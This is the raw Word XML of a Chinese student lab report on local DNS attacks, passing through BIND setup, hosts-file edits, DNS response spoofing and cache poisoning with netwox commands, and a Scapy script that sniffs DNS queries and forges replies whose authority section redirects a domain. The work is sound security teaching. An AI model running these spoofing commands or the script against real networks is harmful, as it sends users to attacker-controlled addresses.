        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AA9425A" wp14:editId="049E89E3">
            <wp:extent cx="5215255" cy="209105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1C51" w14:textId="276FC19A" w:rsidR="00D11A11" w:rsidRDefault="00574460" w:rsidP="005744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2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004C124F">
        <w:t>/etc/bind/192.168.0.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19B9BC" w14:textId="0BC82A67" w:rsidR="00D11A11" w:rsidRDefault="00D11A11" w:rsidP="00D11A11">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc58529546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Task3.4：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:t>BIND服务器并进行测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="680C2D50" w14:textId="7C2909DB" w:rsidR="009F7866" w:rsidRDefault="00D11A11" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们使用以下指令重新启动BIND服务器：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CC5408" w14:textId="59FE22BB" w:rsidR="009F7866" w:rsidRPr="00D11A11" w:rsidRDefault="00D11A11" w:rsidP="00D11A11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sudo service bind9 restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554F6C1B" w14:textId="216EA008" w:rsidR="009F7866" w:rsidRDefault="00D11A11" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在用户机上使用以下指令进行测试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BD1F2F" w14:textId="0A23FE8B" w:rsidR="009F7866" w:rsidRDefault="00D11A11" w:rsidP="00D11A11">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dig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www.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B946D8D" w14:textId="77777777" w:rsidR="005C4A43" w:rsidRDefault="00D11A11" w:rsidP="005C4A43">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A01A849" wp14:editId="50FFF2CC">
            <wp:extent cx="5274310" cy="3761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8D1B" w14:textId="76AAD837" w:rsidR="009F7866" w:rsidRDefault="005C4A43" w:rsidP="005C4A4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解析</w:t>
      </w:r>
      <w:r w:rsidR="00C4711B" w:rsidRPr="00C4711B">
        <w:t>www.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B4B1E6" w14:textId="34180B71" w:rsidR="009F7866" w:rsidRDefault="00D11A11" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以发现example</w:t>
      </w:r>
      <w:r>
        <w:t>.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析得到的IP地址为：192.168.0.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78853E5F" w14:textId="59CD5BAA" w:rsidR="009F7866" w:rsidRDefault="00D11A11" w:rsidP="00D11A11">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc5852954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Task4：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改主机文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="62367E30" w14:textId="10331C13" w:rsidR="009F7866" w:rsidRDefault="005208A4" w:rsidP="009F7866">
      <w:r w:rsidRPr="005208A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="005208A4">
        <w:t>/etc/hosts文件前，ping www.bank32.com不通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA9D539" w14:textId="77777777" w:rsidR="005C4A43" w:rsidRDefault="005208A4" w:rsidP="005C4A43">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005208A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BEDD386" wp14:editId="4DD8AE18">
            <wp:extent cx="3810330" cy="3657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C0EC" w14:textId="4EE8F2D3" w:rsidR="005208A4" w:rsidRDefault="005C4A43" w:rsidP="005C4A4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修改文件前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不通</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82D450" w14:textId="7D16A25B" w:rsidR="005208A4" w:rsidRDefault="005208A4" w:rsidP="009F7866">
      <w:r w:rsidRPr="005208A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="005208A4">
        <w:t xml:space="preserve">/etc/hosts文件中追加一行1.1.1.1 </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00567ED4">
          <w:rPr>
            <w:rStyle w:val="a8"/>
          </w:rPr>
          <w:t>www.bank32.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFD8DF2" w14:textId="77777777" w:rsidR="005C4A43" w:rsidRDefault="001B4A3C" w:rsidP="005C4A43">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AA2F0F2" wp14:editId="332E2988">
            <wp:extent cx="4335145" cy="660400"/>
            <wp:effectExtent l="0" t="0" r="825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82E1" w14:textId="54C18A41" w:rsidR="005208A4" w:rsidRDefault="005C4A43" w:rsidP="005C4A4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/etc/host</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEC2305" w14:textId="7CB1B5BF" w:rsidR="005208A4" w:rsidRDefault="005208A4" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次尝试ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005208A4">
        <w:t>www.bank32.com，</w:t>
      </w:r>
      <w:r w:rsidRPr="005208A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现是去ping</w:t>
      </w:r>
      <w:r w:rsidRPr="005208A4">
        <w:t xml:space="preserve"> 1.1.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1FF041" w14:textId="77777777" w:rsidR="005C4A43" w:rsidRDefault="001B4A3C" w:rsidP="005C4A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45E2782" wp14:editId="449E7291">
            <wp:extent cx="4233545" cy="482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E7A" w14:textId="6F74D80B" w:rsidR="005208A4" w:rsidRDefault="005C4A43" w:rsidP="005C4A4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.1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C714D0" w14:textId="6195157C" w:rsidR="009F7866" w:rsidRDefault="00D11A11" w:rsidP="005208A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc58529548"/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Task5：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接欺骗用户响应</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0D4F6191" w14:textId="46585D02" w:rsidR="009F7866" w:rsidRDefault="005208A4" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在该实验中，我们在攻击机中运行以下命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01189652" w14:textId="1E63FBCF" w:rsidR="005208A4" w:rsidRPr="005208A4" w:rsidRDefault="005208A4" w:rsidP="005208A4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005208A4">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo netwox 105 -h "mail.example.net" -H </w:t>
      </w:r>
      <w:bookmarkStart w:id="25" w:name="_Hlk58526818"/>
      <w:r w:rsidRPr="005208A4">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="005208A4">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.1.1.1" -a "ns.example.com" -A "1.1.1.1" -f "src host 192.168.2.191"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AB4BF6" w14:textId="1C2B1105" w:rsidR="005208A4" w:rsidRDefault="005208A4" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在用户机中运行</w:t>
      </w:r>
      <w:r w:rsidRPr="005208A4">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dig mail.example.net</w:t>
      </w:r>
      <w:r w:rsidRPr="007D20CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以看到</w:t>
      </w:r>
      <w:r w:rsidR="007D20CA" w:rsidRPr="007D20CA">
        <w:t>mail.example.net</w:t>
      </w:r>
      <w:r w:rsidR="007D20CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被映射到了1.1.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2270B0" w14:textId="77777777" w:rsidR="00C4711B" w:rsidRDefault="005208A4" w:rsidP="00C4711B">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005208A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BE7FCC5" wp14:editId="6A877E5B">
            <wp:extent cx="5274310" cy="3183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E1D" w14:textId="7CACF7CA" w:rsidR="005208A4" w:rsidRPr="005208A4" w:rsidRDefault="00C4711B" w:rsidP="00C4711B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF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解析</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4711B">
        <w:t>mail.example.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1971EB43" w14:textId="77777777" w:rsidR="00C4711B" w:rsidRDefault="005208A4" w:rsidP="00C4711B">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005208A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="136A9743" wp14:editId="2EB84325">
            <wp:extent cx="5274310" cy="1642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B316" w14:textId="35DD8F89" w:rsidR="009F7866" w:rsidRDefault="00C4711B" w:rsidP="00C4711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运行欺骗命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A8DC46" w14:textId="1727072D" w:rsidR="009F7866" w:rsidRDefault="00D11A11" w:rsidP="005208A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc58529549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Task6：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:t>DNS缓存中毒攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="175934CC" w14:textId="09BCA3EF" w:rsidR="009F7866" w:rsidRDefault="007D20CA" w:rsidP="009F7866">
      <w:r w:rsidRPr="007D20CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果攻击者可以欺骗其他</w:t>
      </w:r>
      <w:r w:rsidRPr="007D20CA">
        <w:t>DNS服务器的响应，则DNS服务器A将在一定时间段内将欺骗的响应保留在其缓存中。下次，当用户的计算机要解析相同的主机名时，DNS服务器A将使用缓存中的欺骗响应进行回复。这样，攻击者只需欺骗一次，其影响将一直持续到缓存的信息过期为止。这种攻击称为DNS缓存中毒。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E9BF93" w14:textId="198AB44E" w:rsidR="007D20CA" w:rsidRDefault="007D20CA" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在该实验中，我们首先使用以下命令清楚DNS缓存：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7933D1D9" w14:textId="3C00A393" w:rsidR="007D20CA" w:rsidRDefault="007D20CA" w:rsidP="007D20CA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007D20CA">
        <w:t>sudo rndc flush</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170C6C8A" w14:textId="5FBC3B80" w:rsidR="007D20CA" w:rsidRDefault="00E13165" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后使用以下命令进行攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534373E4" w14:textId="6D5256E3" w:rsidR="00E13165" w:rsidRPr="00E13165" w:rsidRDefault="00E13165" w:rsidP="00E13165">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13165">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13165">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> netwox 105 -h "</w:t>
      </w:r>
      <w:r w:rsidR="001B4A3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
      <w:r w:rsidR="00405095">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13165">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>" -H "1.1.1.1" -a "ns.example.com" -A "1.1.1.1" -f "src host 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="001B4A3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.189</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13165">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>" -s raw -T 600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432FDAF5" w14:textId="1745A0CA" w:rsidR="007D20CA" w:rsidRDefault="001B4A3C" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在用户机使用dig命令查询DNS，可以发现IP为1.1.1.1：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC05CC" w14:textId="77777777" w:rsidR="00C4711B" w:rsidRDefault="001B4A3C" w:rsidP="00C4711B">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00405095">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45698969" wp14:editId="6A4BD35E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848" w14:textId="60354519" w:rsidR="00405095" w:rsidRDefault="00C4711B" w:rsidP="00C4711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解析域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165711D3" w14:textId="23BB6328" w:rsidR="00405095" w:rsidRDefault="001B4A3C" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看DNS缓存，也可以发现域名的IP地址被攻击机欺骗到1.1.1.1：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11353FFD" w14:textId="77777777" w:rsidR="00CD2CE2" w:rsidRDefault="00CD2CE2" w:rsidP="00CD2CE2">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00405095">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="166F7394" wp14:editId="62F18928">
            <wp:extent cx="5274310" cy="816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B7FE" w14:textId="61609A13" w:rsidR="00CD2CE2" w:rsidRDefault="00CD2CE2" w:rsidP="00CD2CE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1743C909" w14:textId="45EA11F8" w:rsidR="001B4A3C" w:rsidRDefault="001B4A3C" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WireShark中抓到的欺骗包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C75EC71" w14:textId="77777777" w:rsidR="00C4711B" w:rsidRDefault="001B4A3C" w:rsidP="00C4711B">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00405095">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ABAE3C4" wp14:editId="28723635">
            <wp:extent cx="5274310" cy="746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7001" w14:textId="58CEC91C" w:rsidR="001B4A3C" w:rsidRDefault="00C4711B" w:rsidP="00C4711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2CE2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WireShark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中抓到的欺骗包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EDFE77" w14:textId="642A2378" w:rsidR="009F7866" w:rsidRDefault="00D11A11" w:rsidP="005208A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc58529550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Task7：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:t>DNS缓存中毒：定位到“权限”部分</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="0F9F0B04" w14:textId="54B637BB" w:rsidR="009F7866" w:rsidRDefault="001B4A3C" w:rsidP="001B4A3C">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001B4A3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在上一个任务中，我们的</w:t>
      </w:r>
      <w:r w:rsidRPr="001B4A3C">
        <w:t>DNS缓存中毒攻击仅影响一个主机名，即www.example.net。如果用户尝试获取另一个主机名的IP地址，例如mail.example.net，我们需要再次发起攻击。如果我们发起一种可能影响整个example.net域的攻击，它将更加高效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D84E2CA" w14:textId="1B769D69" w:rsidR="001B4A3C" w:rsidRDefault="001B4A3C" w:rsidP="001B4A3C">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="001B4A3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="001B4A3C">
        <w:t>DNS答复中的“授权”部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现这一目的</w:t>
      </w:r>
      <w:r w:rsidRPr="001B4A3C">
        <w:t>。我们在“权限”部分中添加</w:t>
      </w:r>
      <w:r w:rsidR="00332D13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分</w:t>
      </w:r>
      <w:r w:rsidRPr="001B4A3C">
        <w:t>内容</w:t>
      </w:r>
      <w:r w:rsidR="00332D13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使得</w:t>
      </w:r>
      <w:r w:rsidRPr="001B4A3C">
        <w:t>当本地DNS服务器缓存该条目时，ns.attacker32.com将用作名称服务器，以便将来查询example.net域中的任何主机名。由于Attacker32.com是由攻击者控制的计算机，因此它可以为任何查询提供伪造的答案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30817C38" w14:textId="3A77D62E" w:rsidR="00332D13" w:rsidRDefault="00332D13" w:rsidP="001B4A3C">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Hlk58528787"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面是使用scapy编写的欺骗程序代码：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:p w14:paraId="4BC2A3AC" w14:textId="63779FB4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coding=utf-8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0DDD06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py.all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7FE4D2FE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7F53BC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poof_dns(pkt):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BC17B6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NS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ww.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DNS].qd.qname):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E64E60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Ppkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5987A1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DPpkt = UDP(dport=pkt[UDP].sport, sport=53)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4DB4A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nssec = DNSRR(rrname=pkt[DNS].qd.qname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1.1.1.1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D4DA1BD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Ssec1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su.edu.cn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642B33E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sec1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su.edu.cn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2.2.2.2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7E3145C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NSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,qdcount=1, ancount=1, nscount=1, arcount=1,an=Anssec, ns=NSsec1 ,ar=Addsec1)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D90E82A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poofpkt = IPpkt/UDPpkt/DNSpkt  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B274575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nd(spoofpkt)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA08E2C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[+] got one"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67ADA59" w14:textId="77777777" w:rsidR="007D20CA" w:rsidRPr="007D20CA" w:rsidRDefault="007D20CA" w:rsidP="007D20C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 = sniff(filter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udp and dst port 53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rn=spoof_dns)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50061032" w14:textId="38105286" w:rsidR="009F7866" w:rsidRDefault="00332D13" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行该代码，并通过WireShark</w:t>
      </w:r>
      <w:r w:rsidR="00E13165" w:rsidRPr="00E13165">
        <w:t>抓取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidR="00E13165" w:rsidRPr="00E13165">
        <w:t>流量包。可以看到目标被解析到了另外的dns服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF8A26" w14:textId="5BA34336" w:rsidR="007D20CA" w:rsidRDefault="00E13165" w:rsidP="00332D13">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E13165">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2156683A" wp14:editId="43466D29">
            <wp:extent cx="5274310" cy="14909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7B" w14:textId="34E98161" w:rsidR="007D20CA" w:rsidRDefault="00332D13" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过dig查询DNS记录，可以发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00332D13">
        <w:t>csu.edu.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的IP变为了2.2.2.2</w:t>
      </w:r>
      <w:r w:rsidR="00E13165">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1708191C" w14:textId="7D152387" w:rsidR="007D20CA" w:rsidRDefault="00E13165" w:rsidP="00332D13">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E13165">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C12C9A0" wp14:editId="48D521BD">
            <wp:extent cx="5274310" cy="31997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AA91" w14:textId="438D11E4" w:rsidR="009F7866" w:rsidRDefault="00D11A11" w:rsidP="005208A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc58529551"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005208A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="005208A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005208A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Task8：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
